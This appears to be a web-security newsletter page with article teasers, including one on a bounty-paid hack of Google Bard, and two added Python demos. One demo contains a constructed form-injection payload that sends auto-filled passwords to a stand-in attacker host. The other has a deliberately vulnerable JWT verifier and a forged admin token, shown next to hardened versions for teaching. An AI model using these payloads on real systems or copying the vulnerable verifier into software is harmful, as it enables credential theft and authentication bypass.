This XSS by Brett Buerhaus is amazing! It takes multiple steps and ends with DOM Clobbering, a technique I know mostly from CTF challenges, so it's always satisfying to see something like this on a real-world target...
#73
OAuth redirect URI research paper
A few weeks ago, I had to dive fairly deep into the OAuth protocol and into how different providers actually validate the redirect_uri. I even thought that if I did it on a bigger scale, it could become a larger research project and a good talk. But I see that this paper did a...
You cannot simply access private secure links publicly, can you?
Whenever I'm sharing something via a URL, I wonder if it will get indexed by URL analysis tools, thus becoming public to anyone. Unfortunately, from this blog post we can learn that there is a great chance it will. It's quite hard to say which tool...
They Hacked Google A.I. for $50,000
Joseph "rez0" Thacker, Justin "Rhynorater" Gardner and I, Roni "Lupin" Carta, collaborated on hacking Google Bard, which resulted in $50,000 of bounties. They have other interesting bugs as well, like an IDOR that allowed you to describe someone's...
Using form hijacking to bypass CSP
Password managers are great. They're the first thing I recommend to my non-tech friends. Apart from being more secure than reusing passwords, they also make it very convenient to have your password filled in by the browser extension. However, the auto-fill mechanism also comes...
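The heading refers to form hijacking: when a strict CSP blocks script execution, an attacker with an HTML injection can still open a `<form action="https://attacker...">` ahead of the page's login inputs, so that whatever the password manager auto-fills is submitted to the attacker. The directive that decides whether that submission is allowed is `form-action`, and it does not inherit from `default-src`. The checker below is an added illustration (not code from the linked article or from any project it describes) with a constructed weak policy beside a hardened one; the origins, nonce and policies are made up for the example, and the source-expression matching is simplified to `'self'`, `'none'`, `*`, scheme sources and plain host origins.

```python
from urllib.parse import urlsplit

# Added example, not the article's code. Origins and policies below are constructed.
PAGE = "https://app.example.test/login"
ATTACKER = "https://attacker.example.test/collect"

# Weak: scripts are locked down with a nonce, but nothing restricts where forms may submit.
WEAK_CSP = "default-src 'self'; script-src 'nonce-r4nd0m'; object-src 'none'"
# Hardened: the same policy plus an explicit form-action allowlist.
HARDENED_CSP = WEAK_CSP + "; form-action 'self'"

# What the injection looks like (constructed): an unclosed form tag placed before the
# site's own <form>. The HTML parser ignores a nested <form> start tag, so the login
# inputs (and the auto-filled credentials) end up belonging to the attacker's form.
INJECTED_MARKUP = '<form action="https://attacker.example.test/collect">'


def parse_csp(header: str) -> dict:
    """Split a Content-Security-Policy header into {directive: [source expressions]}."""
    policy = {}
    for directive in header.split(";"):
        parts = directive.split()
        if parts:
            # CSP keeps the first occurrence of a repeated directive.
            policy.setdefault(parts[0].lower(), parts[1:])
    return policy


def _source_matches(source: str, target: str, page: str) -> bool:
    """Simplified CSP source-expression matching (no ports, no path, no wildcards)."""
    src = source.lower()
    if src == "'none'":
        return False
    if src == "*":
        return True
    t = urlsplit(target)
    if src == "'self'":
        p = urlsplit(page)
        return (t.scheme, t.netloc) == (p.scheme, p.netloc)
    if src.endswith(":") and "/" not in src:  # scheme-source such as https:
        return t.scheme == src[:-1]
    s = urlsplit(src if "://" in src else f"{t.scheme}://{src}")
    return s.scheme == t.scheme and s.hostname == t.hostname


def form_can_submit_to(csp: str, target: str, page: str) -> bool:
    """Can a form on `page` submit to `target` under `csp`?

    Only form-action governs submissions, and unlike the fetch directives it does
    NOT fall back to default-src: a policy without form-action allows any target,
    no matter how strict script-src is.
    """
    policy = parse_csp(csp)
    if "form-action" not in policy:
        return True
    return any(_source_matches(s, target, page) for s in policy["form-action"])


if __name__ == "__main__":
    for name, csp in (("weak", WEAK_CSP), ("hardened", HARDENED_CSP)):
        allowed = form_can_submit_to(csp, ATTACKER, PAGE)
        print(f"{name}: injected form may submit to attacker -> {allowed}")
```

Run against the constructed policies, the weak policy lets the injected form post to the attacker's origin even though no script can run, while the hardened one confines submissions to the page's own origin.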
How NOT to Train Your Hack Bot: Dos and Don’ts of Building Offensive GPTs
Will AI hacking agents replace us hackers? This is a question I've been asked a few times already. It's hard not to think about it; certainly I have. So this week I watched a Black Hat talk on offensive GPTs to see what was presented there about the...
ALB auth bypass using an untrusted JWT token
Usually, JWTs do not carry any information about the signing secret that was used. In most cases, a web application uses a single signing secret that is never referenced in the JWT header. However, the specification allows much more: the JOSE header can name the key to use (kid) and even say where to fetch it from (jku, jwk, x5u). Even though developers...
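The point the teaser makes is that once the header is allowed to choose the key, a verifier that trusts that choice without first checking that the named key belongs to its own signer accepts tokens minted by anyone whose key it can resolve. The snippet below is an added illustration, not code from the linked write-up or from AWS: it uses stdlib HS256 and an in-memory key registry as a stand-in for the asymmetric keys and key-lookup endpoint a real deployment would use, and the key identifiers, secrets and issuer URL are constructed for the example. The vulnerable verifier resolves whatever `kid` the token names; the hardened one pins the algorithm, the trusted `kid` set and the `iss` claim before it looks anything up.

```python
import base64
import hashlib
import hmac
import json

# Added example, not the article's code. HS256 via hmac stands in for the asymmetric
# keys a real identity provider or load balancer would use.


def _b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def _b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def _json(obj) -> bytes:
    return json.dumps(obj, separators=(",", ":"), sort_keys=True).encode()


def sign_hs256(payload: dict, kid: str, key: bytes) -> str:
    """Issue a JWT whose header names (via kid) the key the verifier should use."""
    header = {"alg": "HS256", "typ": "JWT", "kid": kid}
    signing_input = _b64url(_json(header)) + "." + _b64url(_json(payload))
    sig = hmac.new(key, signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + _b64url(sig)


# Constructed key registry: think of it as the key-resolution service the app
# queries by kid. It serves keys for every signer it knows, not just the one this
# app trusts, which is what makes "look up whatever kid the token says" dangerous.
KEY_REGISTRY = {
    "app-signer-2024": b"constructed-secret-of-the-real-signer",
    "attacker-signer": b"constructed-secret-the-attacker-controls",
}
TRUSTED_KIDS = {"app-signer-2024"}
EXPECTED_ISS = "https://auth.example.test"  # hypothetical issuer for this example


def _split(token: str):
    h, p, s = token.split(".")
    return json.loads(_b64url_decode(h)), json.loads(_b64url_decode(p)), _b64url_decode(s), h + "." + p


def _check_signature(key: bytes, signing_input: str, sig: bytes) -> None:
    expected = hmac.new(key, signing_input.encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(sig, expected):
        raise ValueError("bad signature")


def verify_vulnerable(token: str) -> dict:
    """Trusts the header: resolve the kid it names and check the signature.
    The signature is genuinely valid, just not for a signer this app should accept."""
    header, payload, sig, signing_input = _split(token)
    _check_signature(KEY_REGISTRY[header["kid"]], signing_input, sig)
    return payload


def verify_hardened(token: str) -> dict:
    """Pin alg and signer before any key is resolved, then pin the issuer claim."""
    header, payload, sig, signing_input = _split(token)
    if header.get("alg") != "HS256":
        raise ValueError("unexpected alg")
    kid = header.get("kid")
    if kid not in TRUSTED_KIDS:
        raise ValueError("untrusted signer")
    _check_signature(KEY_REGISTRY[kid], signing_input, sig)
    if payload.get("iss") != EXPECTED_ISS:
        raise ValueError("unexpected issuer")
    return payload


def demo() -> dict:
    """Run both verifiers over a legitimate token and one forged with the attacker's key."""
    legit = sign_hs256({"sub": "alice", "iss": EXPECTED_ISS},
                       "app-signer-2024", KEY_REGISTRY["app-signer-2024"])
    forged = sign_hs256({"sub": "admin", "iss": "https://attacker.example.test"},
                        "attacker-signer", KEY_REGISTRY["attacker-signer"])
    results = {}
    for vname, verifier in (("vulnerable", verify_vulnerable), ("hardened", verify_hardened)):
        for tname, token in (("legit", legit), ("forged", forged)):
            try:
                verifier(token)
                results[(vname, tname)] = "accepted"
            except (ValueError, KeyError):
                results[(vname, tname)] = "rejected"
    return results


if __name__ == "__main__":
    for (verifier, token), outcome in demo().items():
        print(f"{verifier:10} {token:6} -> {outcome}")
```

The forged token carries a correct signature, so signature checking alone cannot catch it; only deciding up front which signer and issuer the application is willing to accept does.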